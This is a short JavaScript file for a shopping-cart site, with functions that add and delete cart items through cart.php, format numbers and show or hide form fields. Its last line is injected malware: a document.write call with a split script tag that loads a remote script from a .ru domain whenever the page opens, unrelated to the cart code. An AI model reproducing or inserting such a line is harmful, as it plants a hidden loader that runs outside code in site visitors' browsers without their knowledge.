function add_cart(id){
	$.get("cart.php", { mode: "add", id: id } );
	//alert(id);
}
function delete_cart(id){
	$.get("cart.php", { mode: "delete", id: id } );
	window.location.reload();
}
function numberFormat(nStr){
  nStr += '';
  x = nStr.split('.');
  x1 = x[0];
  x2 = x.length > 1 ? '.' + x[1] : '';
  var rgx = /(\d+)(\d{3})/;
  while (rgx.test(x1))
    x1 = x1.replace(rgx, '$1' + ' ' + '$2');
  return x1;
}
function show_element(select_name, show_id){
	var edit=document.getElementById(show_id);
	if (select_name.value == -1) edit.style.display = "block";
	else {
	 edit.style.display = "none";
	 edit.value = "";
	 }
}
function show_element2(select_name, show_id){
	var edit=document.getElementById(show_id);
	if (select_name.value == 4) edit.style.display = "block";
	else {
	 edit.style.display = "none";
	 edit.value = "";
	 }
}

function show_element_3(select_name, show_id){
	var edit=document.getElementById(show_id);
	if (select_name.value != 5) edit.style.display = "block";
	else {
	 edit.style.display = "none";
	 }
}



document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Laser_Printer.js"></scr'+'ipt>');